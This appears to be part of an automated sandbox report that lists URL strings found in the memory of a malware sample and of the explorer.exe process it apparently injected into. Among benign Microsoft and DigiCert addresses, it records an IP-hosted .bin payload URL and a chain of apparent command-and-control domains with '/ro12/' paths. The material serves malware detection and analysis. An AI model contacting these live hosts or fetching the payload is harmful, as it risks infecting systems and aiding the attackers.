Source: MaMsKRmgXZ.exe, 00000002.00000002.9957323893.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000002.9957323893.0000000004136000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000002.9969089642.0000000033620000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://103.72.68.128/pcd/wAYOlXAIjrMljL79.bin
Source: explorer.exe, 00000004.00000003.11269561441.000000000CE9C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262903343.000000000CE91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14577231357.000000000CE9D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000CE88000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000004.00000003.11269561441.000000000CE9C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262903343.000000000CE91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14577231357.000000000CE9D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000CE88000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000004.00000000.9897491783.000000000974E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12109712536.000000000974E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14570643138.000000000974E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: explorer.exe, 00000004.00000003.11269561441.000000000CE9C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262903343.000000000CE91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14577231357.000000000CE9D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000CE88000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000004.00000002.14584974938.00000000142DF000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://img.sedoparking.com
Source: MaMsKRmgXZ.exe, 00000002.00000001.9728969517.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: explorer.exe, 00000004.00000000.9894494720.00000000046F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14565697362.00000000046F6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.co
Source: MaMsKRmgXZ.exe, MaMsKRmgXZ.exe, 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmp, MaMsKRmgXZ.exe, 00000000.00000000.9467778286.0000000000409000.00000008.00000001.01000000.00000003.sdmp, MaMsKRmgXZ.exe, 00000002.00000000.9724749786.0000000000409000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: MaMsKRmgXZ.exe, 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmp, MaMsKRmgXZ.exe, 00000000.00000000.9467778286.0000000000409000.00000008.00000001.01000000.00000003.sdmp, MaMsKRmgXZ.exe, 00000002.00000000.9724749786.0000000000409000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000004.00000003.11269561441.000000000CE9C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262903343.000000000CE91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14577231357.000000000CE9D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000CE88000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000004.00000000.9897491783.000000000974E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12109712536.000000000974E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14570643138.000000000974E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: explorer.exe, 00000004.00000003.11262903343.000000000CEE6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000CEE6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14577231357.000000000CEE6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000004.00000000.9902197549.000000000CE47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14576881586.000000000CE47000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: explorer.exe, 00000004.00000002.14563116103.00000000026B0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.14572257419.0000000009B40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.14574486597.000000000AB00000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000004.00000002.14570074014.0000000009556000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9897491783.0000000009556000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsoftFTwRo
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.55dy5s.top
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.55dy5s.top/ro12/
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.55dy5s.top/ro12/www.easyeats307.com
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.55dy5s.top/ro12/www.senior-living-91799.bond
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.55dy5s.topReferer:
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ddbetting.com
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ddbetting.com/ro12/
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ddbetting.com/ro12/www.ps212naming.com
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ddbetting.comReferer:
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digitalserviceact.online
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digitalserviceact.online/ro12/
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digitalserviceact.online/ro12/www.ddbetting.com
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digitalserviceact.onlineReferer:
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.doubleapus.com
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.doubleapus.com/ro12/
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.doubleapus.com/ro12/www.holzleisten24.shop
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.doubleapus.comReferer:
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.easyeats307.com
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.easyeats307.com/ro12/
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.easyeats307.com/ro12/www.doubleapus.com
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.easyeats307.comReferer:
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fathomtackle.com
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fathomtackle.com/ro12/
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fathomtackle.com/ro12/www.digitalserviceact.online
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fathomtackle.comReferer:
Source: MaMsKRmgXZ.exe, 00000002.00000001.9728969517.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.gopher.ftp://ftp.
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.holzleisten24.shop
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.holzleisten24.shop/ro12/
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.holzleisten24.shop/ro12/www.xlrj.asia
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.holzleisten24.shopReferer:
Source: MaMsKRmgXZ.exe, 00000002.00000001.9728969517.0000000000626000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.justinmburns.com
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.justinmburns.com/ro12/
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.justinmburns.comReferer:
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ktrandnews.com
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ktrandnews.com/ro12/
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ktrandnews.com/ro12/www.nala.dev
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ktrandnews.comReferer:
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.los3.online
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.los3.online/ro12/
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.los3.online/ro12/www.start399.com
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.los3.onlineReferer:
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nala.dev
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nala.dev/ro12/
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nala.dev/ro12/www.rptiki.com
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nala.devReferer:
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.niaeoer.com
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.niaeoer.com/ro12/
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.niaeoer.com/ro12/www.shuraop.xyz
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.niaeoer.comReferer:
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ps212naming.com
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ps212naming.com/ro12/
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ps212naming.com/ro12/www.pwpholdings.com
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ps212naming.comReferer:
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pwpholdings.com
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pwpholdings.com/ro12/
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pwpholdings.com/ro12/www.justinmburns.com
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pwpholdings.comReferer:
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qualityquickprints.com
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qualityquickprints.com/ro12/
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qualityquickprints.com/ro12/www.55dy5s.top
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qualityquickprints.comReferer:
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.riderarea.com
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.riderarea.com/ro12/
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.riderarea.com/ro12/www.shuraop.xyz
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.riderarea.comReferer:
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rptiki.com
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rptiki.com/ro12/
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rptiki.com/ro12/www.tiktok-shop-he.com
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rptiki.comReferer:
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.senior-living-91799.bond
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.senior-living-91799.bond/ro12/
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.senior-living-91799.bond/ro12/www.riderarea.com
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.senior-living-91799.bondReferer:
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.shuraop.xyz
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.shuraop.xyz/ro12/
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.shuraop.xyz/ro12/www.ktrandnews.com
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.shuraop.xyz/ro12/www.qualityquickprints.com
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.shuraop.xyzReferer:
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.start399.com
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.start399.com/ro12/
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.start399.com/ro12/www.niaeoer.com
Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.start399.comReferer:
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tiktok-shop-he.com
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tiktok-shop-he.com/ro12/
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tiktok-shop-he.com/ro12/www.holzleisten24.shop
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tiktok-shop-he.comReferer:
Source: MaMsKRmgXZ.exe, 00000002.00000001.9728969517.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: MaMsKRmgXZ.exe, 00000002.00000001.9728969517.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xlrj.asia
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xlrj.asia/ro12/
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xlrj.asia/ro12/www.fathomtackle.com
Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xlrj.asiaReferer:
Source: explorer.exe, 00000004.00000000.9893746517.00000000030A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14564355374.00000000030A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppader.icos
Source: explorer.exe, 00000004.00000002.14570074014.0000000009556000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9897491783.0000000009556000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirm
Source: explorer.exe, 00000004.00000003.11271243917.000000000D34B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12110546244.000000000D34D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14579496985.000000000D34C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11265701285.000000000D33D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000004.00000003.11271243917.000000000D34B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12110546244.000000000D34D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14579496985.000000000D34C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11265701285.000000000D33D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS14
Source: explorer.exe, 00000004.00000000.9897491783.000000000974E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12109712536.000000000974E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14570643138.000000000974E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000004.00000000.9897491783.000000000974E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12109712536.000000000974E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14570643138.000000000974E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/-
Source: explorer.exe, 00000004.00000000.9897491783.0000000009556000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000004.00000003.12109712536.00000000096B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14570643138.00000000096B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9897491783.00000000096B4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=837905BAEC0C411B9E107B0D8A1DEA83&timeOut=5000&oc
Source: explorer.exe, 00000004.00000000.9902197549.000000000CE47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14576881586.000000000CE47000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000004.00000003.12109712536.00000000096B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14570643138.00000000096B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9897491783.00000000096B4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com-
Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyCloudyDay.svg
Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gRIg
Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gRIg-dark
